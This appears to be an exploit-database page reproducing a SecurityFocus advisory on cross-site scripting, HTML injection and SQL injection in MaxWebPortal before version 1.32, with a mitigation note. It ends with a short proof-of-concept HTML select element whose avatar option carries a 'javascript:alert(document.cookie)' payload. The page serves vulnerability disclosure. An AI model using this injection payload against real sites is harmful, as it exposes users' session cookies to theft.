header-logo
Suggest Exploit
vendor:
MaxWebPortal
by:
SecurityFocus
8.3
CVSS
HIGH
Cross-site Scripting, HTML Injection and SQL Injection
79, 89, 89
CWE
Product Name: MaxWebPortal
Affected Version From: Prior to 1.32
Affected Version To: Prior to 1.32
Patch Exists: YES
Related CWE: N/A
CPE: maxwebportal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

MaxWebPortal Multiple Vulnerabilities

It has been reported that MaxWebPortal may be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied input. The specific issues include cross-site scripting, HTML injection and SQL injection.

Mitigation:

Input validation and sanitization should be implemented to prevent malicious user input from being executed.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9625/info
 
It has been reported that MaxWebPortal may be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied input. The specific issues include cross-site scripting, HTML injection and SQL injection.
 
MaxWebPortal versions prior to 1.32 have been reported to be prone to these issues.

<select name="Avatar_URL" size="4" onChange ="if (CheckNav(3.0,4.0)) URL.src=form.Avatar_URL.options[form.Avatar_URL.options.selectedIndex].value;">
<option value="javascript:alert(document.cookie)">POC-Avatar</option></select>

Navigation

Suggest Exploit

Services By CQR